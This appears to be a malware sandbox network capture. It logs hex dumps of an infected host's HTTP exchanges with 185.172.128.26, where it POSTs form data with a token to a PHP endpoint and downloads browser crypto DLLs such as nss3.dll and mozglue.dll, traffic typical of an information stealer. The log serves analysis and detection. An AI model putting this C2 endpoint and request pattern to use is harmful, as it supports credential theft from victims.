00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
Mar 28, 2024 09:15:27.462480068 CET	1286	IN	Data Raw: 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @B/81s:<R@B/92P @B
Mar 28, 2024 09:15:27.462555885 CET	1286	IN	Data Raw: 5d c3 8d b4 26 00 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 Data Ascii: ]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Mar 28, 2024 09:15:27.462642908 CET	242	IN	Data Raw: 08 85 d2 74 04 0f b6 42 14 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 Data Ascii: tB]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU
Mar 28, 2024 09:15:27.463010073 CET	1286	IN	Data Raw: 24 ff d2 c9 c3 31 c0 c3 55 85 c0 89 e5 74 10 8b 88 0c 01 00 00 85 c9 74 06 ff 41 24 89 51 0c 89 d0 5d c3 85 c0 74 4d 0f b6 08 80 b9 e0 a1 ec 61 00 89 ca 79 3f 55 80 f9 5b b1 5d 0f 44 d1 b9 01 00 00 00 89 e5 57 56 53 be 01 00 00 00 8a 1c 08 8d 7e Data Ascii: $1UttA$Q]tMay?U[]DWVS~8u:TuT0A\0AF[8^_]UVS149uuaa)uC[^]UEUu1t]]UWVMSU}u1K
Mar 28, 2024 09:15:28.750808954 CET	1286	IN	DELETE FROM %Q.'%q_segdir'DELETE FROM %Q.'%q_docsize'DELETE FROM %Q.'%q_stat'SELECT %s WHERE rowid=?SELECT (SELECT max(idx) FROM %Q.'%q_segdir' WHERE level = ?) + 1REPLACE INTO %Q.'%q_segments'(blockid, block) VALUES(?, ?)SELECT coalesce((SELECT max(blockid) FROM %Q.'%q_segments') + 1, 1)REPLACE INTO %Q.'%q_segdir' VALUES(?,?,?,?,?,?)SELECT idx, start_block, leaves_end_block, end_block, root FROM %Q.'%q_segdir' WHERE level = ? ORDER BY idx ASCSELECT idx, start_block, leaves_end_block, end_block, root FROM %Q.'%q_segdir' WHERE level BETWEEN ? AND ?ORDER BY level DESC, idx ASCSELECT count() FROM %Q.'%q_segdir' WHERE level = ?SELECT max(level) FROM %Q.'%q_segdir' WHERE level BETWEEN ? AND ?DELETE FROM %Q.'%q_segdir' WHERE level = ?DELETE FROM %Q.'%q_segments' WHERE blockid BETWEEN ? AND ?DELETE FROM %Q.'%q_docsize' WHERE docid = ?SELECT size FROM %Q.'%q_docsize' WHERE docid=?SELECT value FROM %Q.'%q_stat' WHERE id=?REPLACE INTO %Q.'%q_stat' VALUES(?,?)DELETE FROM %Q.'%q_segdir' WHERE level BETWEEN ? AND ?SELECT ? UNION SELECT level / (1024 ?) FROM %Q.'%q_segdir'SELECT level, count() AS cnt FROM %Q.'%q_segdir' GROUP BY level HAVING cnt>=? ORDER BY (level %% 1024) ASC, 2 DESC LIMIT 1SELECT 2 total(1 + leaves_end_block - start_block) FROM Data Raw: Data Ascii:
Mar 28, 2024 09:15:30.076419115 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH Host: 185.172.128.26 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:30.995105028 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:31.428823948 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKF Host: 185.172.128.26 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:32.110306025 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:32.235702038 CET	560	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDG Host: 185.172.128.26 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 48 4e 6e 5a 32 56 6e 5a 57 63 75 5a 6d 6c 73 5a 51 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="file_name"ZHNnZ2VnZWcuZmlsZQ==------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="file"------DBKKFCBAKKFBGCBFHJDG--
Mar 28, 2024 09:15:32.911854029 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:33.721904039 CET	560	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKKEHJDHJKFIECAAKFI Host: 185.172.128.26 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 48 4e 6e 5a 32 56 6e 5a 57 63 75 5a 6d 6c 73 5a 51 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 2d 2d 0d 0a Data Ascii: ------IJKKEHJDHJKFIECAAKFIContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------IJKKEHJDHJKFIECAAKFIContent-Disposition: form-data; name="file_name"ZHNnZ2VnZWcuZmlsZQ==------IJKKEHJDHJKFIECAAKFIContent-Disposition: form-data; name="file"------IJKKEHJDHJKFIECAAKFI--
Mar 28, 2024 09:15:34.067854881 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:34.328393936 CET	93	OUT	GET /8e6d9db21fb63946/freebl3.dll HTTP/1.1 Host: 185.172.128.26 Cache-Control: no-cache
Mar 28, 2024 09:15:34.629442930 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:34 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Mar 28, 2024 09:15:35.665438890 CET	93	OUT	GET /8e6d9db21fb63946/mozglue.dll HTTP/1.1 Host: 185.172.128.26 Cache-Control: no-cache
Mar 28, 2024 09:15:35.954107046 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:35 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Mar 28, 2024 09:15:36.393634081 CET	94	OUT	GET /8e6d9db21fb63946/msvcp140.dll HTTP/1.1 Host: 185.172.128.26 Cache-Control: no-cache
Mar 28, 2024 09:15:36.693989992 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:36 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Mar 28, 2024 09:15:37.299235106 CET	90	OUT	GET /8e6d9db21fb63946/nss3.dll HTTP/1.1 Host: 185.172.128.26 Cache-Control: no-cache
Mar 28, 2024 09:15:37.599304914 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:37 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 